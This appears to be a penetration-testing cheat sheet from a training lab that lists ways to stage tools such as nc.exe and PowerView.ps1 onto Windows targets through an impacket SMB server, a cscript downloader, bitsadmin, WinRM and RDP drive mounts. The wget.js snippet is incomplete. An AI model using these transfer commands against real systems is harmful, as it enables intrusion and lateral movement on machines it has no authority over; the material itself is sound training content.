# Create the SMB Server using smbserver.py
sudo impacket-smbserver share -smb2support /tmp/smbshare
# Copy a File from the SMB Server
C:\user> copy \\\share\nc.exe
# Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
# Copy a File from the SMB Server
C:\user> net use n: \\\share /user:test test
C:\user> copy n:\nc.exe
# creat a file called wget.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
# Download a file using cscript.exe
cscript.exe /nologo wget.js https://path/PowerView.ps1 PowerView.ps1
File transfer using WinRM
# Create a PowerShell Remoting Session to DATABASE01
$Session = New-PSSession -ComputerName DATABASE01
# Copy samplefile.txt from our Localhost to the DATABASE01 Session
Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\
# Copy DATABASE.txt from DATABASE01 Session to our Localhost
Copy-Item -Path "C:\DATABASE.txt" -Destination C:\ -FromSession $Session
File transfer with RDP
# Mounting a Linux Folder Using rdesktop
rdesktop <IP> -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/'
# Mounting a Linux Folder Using xfreerdp
xfreerdp /v:<IP> /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/
Download a file using Bitsadmin
bitsadmin /transfer n C:\Temp\nc.exe